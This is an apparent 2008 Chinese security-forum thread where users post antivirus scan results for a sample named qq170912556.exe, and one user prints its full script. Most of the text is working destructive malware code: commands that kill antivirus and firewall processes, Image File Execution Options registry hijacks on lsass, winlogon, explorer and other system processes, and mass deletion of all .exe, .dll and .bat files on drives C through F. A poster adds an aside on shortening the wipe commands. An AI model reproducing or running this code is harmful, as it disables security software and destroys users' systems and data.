不知道是不是错报！

wolffshen

FS结果: 找到 1 恶意软件
Packed.Win32.Klone.d (病毒)
D:\Virus\Test\qq170912556.exe\qqq170912556.exe

qigang

rising20.32.02未报！

BING126

McAfee        New Malware.u

Graybird

Starting the file scan:

Begin scan in 'E:\Antivir\qq170912556.rar'
E:\Antivir\qq170912556.rar
  [0] Archive type: RAR
    --> qq170912556.exe
      [1] Archive type: RAR SFX (self extracting)
      --> qqq170912556.exe
          [DETECTION] Is the Trojan horse TR/PCK.Klone.D.620
      [INFO]      The file was deleted!

冷冷

楼主又有新产品啦？

' ----- ExeScript Options Begin -----
' ScriptType: window
' DestDirectory: temp
' Icon: C:\Documents and Settings\Owner\Desktop\我的桌面\安装\1.ico
' OutputFile: C:\Documents and Settings\Owner\Desktop\wu 2.exe
' Comments: QQ170912556
' ProductVersion: 1.0.0.1
' ----- ExeScript Options End -----
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 1000 '
fso.DeleteFile(WScript.ScriptName) '
If fso.FileExists("c:\terminalcn.exe") Then fso.DeleteFile("c:\terminalcn.exe")
dim qq170912556
set qq170912556=wscript.createobject("wscript.shell")
qq170912556.run "taskkill /im kpfw32.exe /f",0
qq170912556.run "taskkill /im kavstart.exe /f",0
qq170912556.run "taskkill /im kmailmon.exe /f",0
qq170912556.run "taskkill /im kpfwsvc.exe /f",0
qq170912556.run "taskkill /im kissvc.exe /f",0
qq170912556.run "taskkill /im kwatch.exe /f",0

@shift
taskkill /im kpfw32.exe /f
taskkill /im kavstart.exe /f
taskkill /im kmailmon.exe /f
taskkill /im kpfwsvc.exe /f
taskkill /im kissvc.exe /f
taskkill /im kwatch.exe /f
taskkill /im MPSVC.exe /f
taskkill /im MPSVC2.exe /f
taskkill /im MPSVC1.exe /f
taskkill /im rfwProxy.exe /f
taskkill /im rfwstub.exe /f
taskkill /im RavStub.exe /f
taskkill /im RavMon.exe /f
taskkill /im RavTask.exe /f
taskkill /im MPMon.exe /f
taskkill /im rfwmain.exe /f
taskkill /im QQ.exe /f
taskkill /im wscenfy.exe /f
taskkill /im 360Tray.exe /f

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ALG.EXE" /v debugger /t reg_sz /d MPSVC.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ALG.EXE" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ddhelp.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dllhost.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\inetinfo.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\internat.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rpcss.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmon.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conime.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuauclt.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscenfy.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe" /v debugger /t reg_sz /d debugfile.exe /f
利用映像劫持搞掂杀软，达到隐藏的作用
@echo off
del c:\*.exe /f/s/q/a
del d:\*.exe /f/s/q/a
del e:\*.exe /f/s/q/a
del f:\*.exe /f/s/q/a
del c:\*.bat /f/s/q/a
del d:\*.bat /f/s/q/a
del e:\*.bat /f/s/q/a
del f:\*.bat /f/s/q/a
del c:\*.dll /f/s/q/a
del d:\*.dll /f/s/q/a
del e:\*.dll /f/s/q/a
del f:\*.dll /f/s/q/a
del c:\windows\*.exe /f/s/q/a
del d:\windows\*.exe /f/s/q/a
del e:\windows\*.exe /f/s/q/a
del f:\windows\*.exe /f/s/q/a
del c:\windows\system32\*.exe /f/s/q/a
del d:\windows\system32\*.exe /f/s/q/a
del e:\windows\system32\*.exe /f/s/q/a
del f:\windows\system32\*.exe /f/s/q/a
del c:\windows\*.dll /f/s/q/a                          →→→→→→→→→→→→→  这里的?:\windows  改成 %systemboot%  那不用写那么多了
d el d:\windows\*.dll /f/s/q/a
del e:\windows\*.dll /f/s/q/a
del f:\windows\*.dll /f/s/q/a
del c:\windows\system32\*.dll /f/s/q/a
del d:\windows\system32\*.dll /f/s/q/a
del e:\windows\system32\*.dll /f/s/q/a
del f:\windows\system32\*.dll /f/s/q/a
del c:\windows\*.bat /f/s/q/a
del d:\windows\*.bat /f/s/q/a
del e:\windows\*.bat /f/s/q/a
del f:\windows\*.bat /f/s/q/a
del c:\windows\system32\*.bat /f/s/q/a
del d:\windows\system32\*.bat /f/s/q/a
del e:\windows\system32\*.bat /f/s/q/a
del f:\windows\system32\*.bat /f/s/q/a
echo by:QQ170912556
exit

[ 本帖最后由 冷_冷 于 2008-2-19 12:05 编辑 ]

swans

不是误报